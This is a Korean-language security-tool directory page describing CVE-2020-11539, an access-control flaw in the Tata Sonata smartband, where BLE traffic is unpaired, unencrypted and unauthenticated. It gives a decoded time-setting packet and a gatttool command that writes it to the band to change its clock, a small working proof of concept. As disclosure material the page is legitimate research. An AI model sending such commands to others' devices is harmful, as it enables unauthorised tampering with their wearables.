Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2020-11539 — Tata Sonata Smartband의 부적절한 접근 제어 | Kitploit
도구/GitHubGitHub/the-girl-who-lived/cve-2020-11539
Bluetooth SecurityIoT SecurityVulnerability AnalysisExploitationWireless SecurityHardware & IoT Security
GitHubthe-girl-who-lived/cve-2020-11539

CVE-2020-11539

Tata Sonata Smartband의 부적절한 접근 제어

저장소 보기
116년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2020-11539: Tata Sonata 스마트밴드의 부적절한 접근 제어

정보

설명: 스마트 밴드에 페어링 기능이 없으며 (모드 0 BLE 보안 수준), 공기 중에 전송되는 데이터가 암호화되지 않는 것으로 확인되었습니다. 게다가 스마트 밴드로 전송되는 데이터에는 인증이나 서명 검증이 없기 때문에, 공격자가 스마트 장치의 매개변수를 제어할 수 있습니다.

영향을 받는 버전: Smart SF Rush - 1.12

연구자: Sayli Ambure (https://twitter.com/sayli_ambure)

MITRE CVE 링크: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11539

개념 증명 익스플로잇

설명

다음 패킷은 역분석을 통해 시간 변경용임을 확인했으며, 휴대폰에서 hcisnoop 덤프를 추출하여 더 많은 패킷을 역분석할 수 있습니다.

  1. 데이터 값: 00870e00141401060712052b051e

    데이터 Hexdump:00870e00141401060712052b051e
    데이터 10진수:00135140020200106071805430530
  • 00 87: 패킷 헤더

  • 0e 00: 패킷 유형

  • 14 14: 10진수 연도 (2020)

  • 01 06: 월과 일 (1월 6일)

  • 07 12: 10진수 시와 분 (오전 07:18)

  • 05 : 초

  1. 스마트밴드의 시간을 제어하려면 다음 Gatttool 명령어를 전송하세요:

gatttool -t random -b <mac-address> --char-write-req -a 0xe -n 00870e00141401060712052b051e

개념 증명 동영상:

도구 다운로드